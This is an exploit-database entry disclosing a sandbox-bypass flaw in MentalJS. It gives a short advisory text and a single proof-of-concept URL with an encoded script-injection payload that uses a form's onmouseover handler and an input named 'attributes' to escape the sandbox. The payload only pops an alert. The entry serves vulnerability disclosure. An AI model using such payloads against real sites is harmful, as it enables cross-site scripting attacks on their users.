[] NeoSense

MentalJS - Sandbox Security Bypass

Author: Rafay Baloch
type: webapps
platform: php
port: 
date_added: 2013-09-20 
date_updated: 2015-11-20 
verified: 1 
codes: OSVDB-97659 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/62581/info

MentalJS is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks.

http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E